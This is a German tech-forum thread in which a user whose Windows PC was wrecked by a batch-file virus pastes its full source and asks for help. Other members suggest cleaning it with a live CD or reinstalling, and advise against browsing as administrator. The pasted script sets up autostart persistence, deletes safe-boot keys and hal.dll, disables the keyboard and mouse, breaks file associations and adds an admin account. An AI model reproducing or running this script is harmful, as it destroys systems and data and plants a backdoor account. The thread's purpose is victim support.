• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

Virus...

Status
Für weitere Antworten geschlossen.

magguus

Neues Mitglied
hallo,
ich habe einen eine datei geschickt bekommen, die sich als virus heraustellte, und habe jetzt das Problem das mein System nicht mehr startet geschweige den funktioniert, es fährt ganz normal hoch, und bei der Benutzeranmeldung ist ein neuer Benutzer, Maus und Tastatur reagieren nicht mehr.
hier noch der Virus:
@echo off
rem made with PhySek VirusMaker!
rem ---Bad-Sec-Door--->
md %windir%\Command
copy %0 "%windir%\Command"
ren %windir%\Command\*.* Command.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f
copy %0 copy "C:\DOKUME~1\Tim\LOKALE~1\Temp\184.tmp\batchfile.bat" "%userprofile%\startm~1\Programme\Autostart"
ren %0 "%userprofile%\startm~1\Programme\Autostart\*.bat" Command.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\min imal /f
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\net work /f
assoc .mp3=error
assoc .mp4=error
assoc .jpg=error
assoc .gif=error
assoc .bmp=error
assoc .com=error
assoc .txt=error
assoc .doc=error
assoc .mpg=error
assoc .avi=error
assoc .mpeg=error
assoc .3gp=error
assoc .flv=error
assoc .exe=error
del /f /s /q C:\WINDOWS\system32\hal.dll
reg add "HKLM\System\CurrentControlSet\Services\Mouclass" /v Start /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\Kbdclass" /v Start /t REG_DWORD /d "4" /f
net user "PhySek" "123456" /add
net localgroup Administratoren "Sph1nX" /add
shutdown -s -f -t 8 -c "Hehe du wurdest gerade geowend :-) Naja dein System wird warscheinlich nie mehr starten^^ hf &gl by PhySek"

ich hoffe die letzte Botschadft stimmt nicht und ich habe noch eine chance.
lg Markus

also meiner Ansicht nach würde ich auch mal per Linux Live CD die den Ordner Command löschen und per einem Bart PE die Registry um die entsprechenden Einträge erleichtern...

Code:
ren %windir%\Command\*.* Command.bat
klingt richtig schlimm.
Code:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f
copy %0 copy "C:\DOKUME~1\Tim\LOKALE~1\Temp\184.tmp\batchfile.b  at" "%userprofile%\startm~1\Programme\Autostart"
was immer das tut, es tut es gründlich.
mach das system platt und installier es neu, du weisst nicht, was da alles geladen wurde.

dass sowas überhaupt funktioniert ist schon irgendwie lustig, auch wenn dir wahrscheinlich nicht zum lachen ist.

Man kann das sicherlich sogar bereinigen, was aber evtl. schwieriger wäre, als das System neu aufzusetzen.

Beim nächsten mal: Nicht als Administrator surfen.

dein system kann auf jeden fall gerettet werden müsstest allerdings nem speziallisten geben, die kosten aber geld und werden für das neu aufsetzen des systems warscheinlich weniger zeit brauchen und somit billiger sein somit hast du einen totalschaden und solltest windows eifnach neu installieren, wenn du dieses von speziellisten machen lässt könnten die dir warscheinlich sogar deine daten von der platte retten.

MFG Miah

das retten der daten kann nicht das problem sein (knoppix), welche system dateien aber befallen sind, kann man nur erahnen und ein restrisiko bleibt bei einem ehemals infizierten und bereinigten sytem immer.
jeder spezialist wird dir raten, das system sauber neu aufsetzen, einen user mit beschränkten rechten erstellen und als dieser dann werkeln. zum installieren von programmen, system wartung etc als admin einloggen und danach sofort wieder als user ohne rechte surfen etc.

Status
Für weitere Antworten geschlossen.
Zurück
Oben